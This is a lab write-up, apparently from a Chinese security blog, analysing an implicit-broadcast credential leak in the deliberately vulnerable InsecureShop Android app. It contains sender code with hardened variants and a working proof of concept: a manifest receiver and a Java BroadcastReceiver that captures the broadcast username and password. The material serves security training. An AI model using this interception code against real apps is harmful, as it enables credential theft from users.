[Android Security] InsecureShop Vulnerability Mining - Part 2

Vulnerability #9 - Using implicit intent to send broadcast with sensitive data

1. Vulnerability analysis

In AboutUsActivity.class you can see that a broadcast is sent implicitly, addressed only by its action, and that its content is the user name and password.
How is onSendData triggered? Checking the source code again shows that there is no direct call to it in the current source file.

The call is probably made elsewhere, so check the layout file activity_about_us.xml.
In the layout file, the onClick event of the button element is bound to the onSendData method.
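The sender pattern described above next to two hardened forms, as an added example (not code from InsecureShop or from the original post). The class name, method names and the permission string are hypothetical; only the action string and the extra keys come from the post.

```java
import android.content.Context;
import android.content.Intent;

// Added illustration: class, method and permission names are hypothetical.
public final class BroadcastSenderExample {

    // Action string as shown in the post.
    static final String ACTION = "com.insecureshop.action.BROADCAST";

    // Hypothetical permission. It has to be declared in the sender's manifest
    // with android:protectionLevel="signature" for the restriction to hold.
    static final String RECEIVE_PERMISSION =
            "com.example.permission.RECEIVE_ACCOUNT_EVENTS";

    // Pattern described in the post: an implicit broadcast carrying credentials.
    // Every app that registers a receiver for ACTION is handed both extras.
    static void sendImplicit(Context ctx, String username, String password) {
        Intent intent = new Intent(ACTION);
        intent.putExtra("username", username);
        intent.putExtra("password", password);
        ctx.sendBroadcast(intent);
    }

    // Hardened: delivery is limited to the sending app's own package,
    // and the password is not placed in the intent at all.
    static void sendToOwnPackage(Context ctx, String username) {
        Intent intent = new Intent(ACTION);
        intent.setPackage(ctx.getPackageName()); // only receivers in this package match
        intent.putExtra("username", username);
        ctx.sendBroadcast(intent);
    }

    // Hardened alternative for a companion app signed with the same key:
    // only receivers holding RECEIVE_PERMISSION are delivered the broadcast.
    static void sendWithPermission(Context ctx, String username) {
        Intent intent = new Intent(ACTION);
        intent.putExtra("username", username);
        ctx.sendBroadcast(intent, RECEIVE_PERMISSION);
    }
}
```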

2. Writing the PoC

2.1 PoC Android APK with targetSdkVersion <= 25: receiver declared in the manifest

If the targetSdkVersion is <= 25 and you want to receive implicit broadcasts, you can declare the receiver in AndroidManifest.xml:

<receiver
    android:name=".vul_broadcastReciever.MyReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="com.insecureshop.action.BROADCAST"/>
    </intent-filter>
</receiver>

MyReceiver.class

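import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class MyReceiver extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent != null) {
            String action = intent.getAction();
            // Only handle the action declared in the manifest's intent-filter
            if ("com.insecureshop.action.BROADCAST".equals(action)) {
                String username = intent.getStringExtra("username");
                String password = intent.getStringExtra("password");

                if (username != null && password != null) {
                    // Send the data to the activity via an explicit intent
                    Intent intent1 = new Intent(context, Vul_getDataFromBroadcast.class);
                    intent1.putExtra("username", username);
                    intent1.putExtra("password", password);
                    // Starting an activity from a receiver's (non-activity) context needs this flag
                    intent1.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
                    context.startActivity(intent1);
                }
            }
        }
    }
}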

Vul_getDataFromBroadcast.class

// Receive the data
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra("password");


Origin blog.csdn.net/tyty2211/article/details/134591385